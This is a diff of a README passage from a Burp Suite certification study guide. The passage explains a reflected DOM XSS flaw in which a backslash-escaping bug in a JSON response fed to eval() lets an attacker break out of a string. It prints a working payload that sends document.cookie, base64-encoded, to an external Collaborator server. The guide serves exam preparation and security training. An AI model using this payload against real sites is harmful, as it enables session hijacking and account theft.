botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/README.md

 ### Reflected XSS (Cookie Stealers)

->In the Search function a Reflected XSS vulnerability is identified.
+>In the **Search** function a Reflected XSS vulnerability is identified.
 The attacker then deliver an exploit link to victim with cookie stealing payload in a hosted **iframe** on their exploit server.

 >The search JavaScript code on the target is using the data in JSON reflected response, that is then send to **eval()** function, and not sanitizing **\\** escape proper user input.
 Backslash is not escaped correct and when the JSON response attempts to escape the opening double-quotes character, it adds a second backslash.
 The resulting double-backslash causes the escaping to be effectively canceled out.

 ```JavaScript
 \"-fetch('https://Collaborator.com?cs='+btoa(document.cookie))}//
 ```

+>Image show the request using search function to send the document.cookie value in base64 to collaboration server.

 ![Reflected dom-xss json cookie stealer](images/reflected-dom-xss-json-cookie-stealer.png)